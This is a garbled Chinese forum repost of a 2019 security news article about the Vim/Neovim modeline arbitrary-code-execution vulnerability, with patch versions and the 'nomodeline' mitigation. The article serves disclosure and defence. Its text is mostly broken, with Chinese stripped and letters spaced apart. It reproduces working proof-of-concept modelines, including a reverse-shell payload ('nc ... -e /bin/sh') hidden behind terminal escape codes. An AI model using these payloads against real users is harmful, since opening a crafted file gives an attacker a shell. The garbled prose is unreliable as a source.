[14199] 2019-06-06_文本编辑器VimNeovim被曝任意代码执行漏洞

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2019-06-06_文本编辑器VimNeovim被曝任意代码执行漏洞 V i m N e o v i m F r e e B u f   2 0 1 9 - 0 6 - 0 6   6 4 A r m i n i u s t w i t t e r V i m / N e o v i m P o C L i n u x 使 p l a i n   . t x t m o d e l i n e s s e t 使 m o d e l i n e s     便 使 使 h t t p s : / / g i t h u b . c o m / v i m / v i m / b l o b / 5 c 0 1 7 b 2 d e 2 8 d 1 9 d f a 4 a f 5 8 b 8 9 7 3 e 3 2 f 3 1 b b 1 4 7 7 e / r u n t i m e / d o c / o p t i o n s . t x t # L 5 8 2 f o l d e x p r f o r m a t e x p r i n c l u d e e x p r i n d e n t e x p r s t a t u s l i n e f o l d t e x t     h t t p s : / / g i t h u b . c o m / v i m / v i m / b l o b / 5 c 0 1 7 b 2 d e 2 8 d 1 9 d f a 4 a f 5 8 b 8 9 7 3 e 3 2 f 3 1 b b 1 4 7 7 e / r u n t i m e / d o c / e v a l . t x t # L 1 3 0 5 0 : s o u r c e ! 使 b a n g   [   ! ] { f i l e } V i m   h t t p s : / / g i t h u b . c o m / v i m / v i m / b l o b / 5 c 0 1 7 b 2 d e 2 8 d 1 9 d f a 4 a f 5 8 b 8 9 7 3 e 3 2 f 3 1 b b 1 4 7 7 e / r u n t i m e / d o c / r e p e a t . t x t # L 1 8 2 N e o v i m e x e c u t e ( ) a s s e r t _ f a i l s ( ) 使 { c m d } 使 f o l d s o u r c e !   % u n a m e   - a   | |   ( g a r b a g e ) s h e l l N e o v i m n v i m _ i n p u t ( ) V i m C V E - 2 0 0 2 - 1 3 7 7 C V E - 2 0 1 6 - 1 2 4 8 P O C 1 p o c . t x t 2 m o d e l i n e ( : s e t   m o d e l i n e ) 3 v i m t x t v i m   p o c . t x t   u n a m e   - a P o C S h e l l   使 c a t P o C 使 使 c a t   - v s h e l l . t x t :   . A P T   沿 / *   v i m :   s e t   t e x t w i d t h = 8 0   t a b s t o p = 8 :   * / : s o [ u r c e ] !   { f i l e } #   v i m :   s e t   f o l d e x p r = e x e c u t e ( ' : s o u r c e !   s o m e _ f i l e ' ) : : ! u n a m e   - a | | "   v i : f e n : f d m = e x p r : f d e = a s s e r t _ f a i l s ( " s o u r c e !   % " ) : f d l = 0 : f d t = "   v i : f e n : f d m = e x p r : f d e = n v i m _ i n p u t ( " : t e r m i n a l   u n a m e   - a " ) : f d l = 0 : ! u n a m e   - a | | "   v i : f e n : f d m = e x p r : f d e = a s s e r t _ f a i l s ( " s o u r c e !   % " ) : f d l = 0 : f d t = " x 1 b [ ? 7 l x 1 b S N o t h i n g   h e r e . x 1 b : s i l e n t !   w   |   c a l l   s y s t e m ( ' n o h u p   n c   1 2 7 . 0 . 0 . 1   9 9 9 9   - e   / b i n / s h   & ' )   |   r e d r a w !   |   f i l e   |   s i l e n t !   #   "   v i m :   s e t   f e n   f d m = e x p r   f d e = a s s e r t _ f a i l s ( ' s e t   f d e = x   |   s o u r c e !   % ' )   f d l = 0 :   x 1 6 x 1 b [ 1 G x 1 6 x 1 b [ K N o t h i n g   h e r e . " x 1 6 x 1 b [ D   n
V i m 8 . 1 . 1 3 6 5 h t t p s : / / g i t h u b . c o m / v i m / v i m / c o m m i t / 5 3 5 7 5 5 2 N e o v i m v 0 . 3 . 6 h t t p s : / / g i t h u b . c o m / n e o v i m / n e o v i m / p u l l / 1 0 0 8 2 h t t p s : / / g i t h u b . c o m / n e o v i m / n e o v i m / r e l e a s e s / t a g / v 0 . 3 . 6 v i m r c s e t   n o m o d e l i n e m o d e l 使 s e c u r e m o d e l i n e s m o d e l i n e e x p r 8 . 1 . 1 3 6 6 V i m m o d e l * g i t h u b F r e e B u f . C O M
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则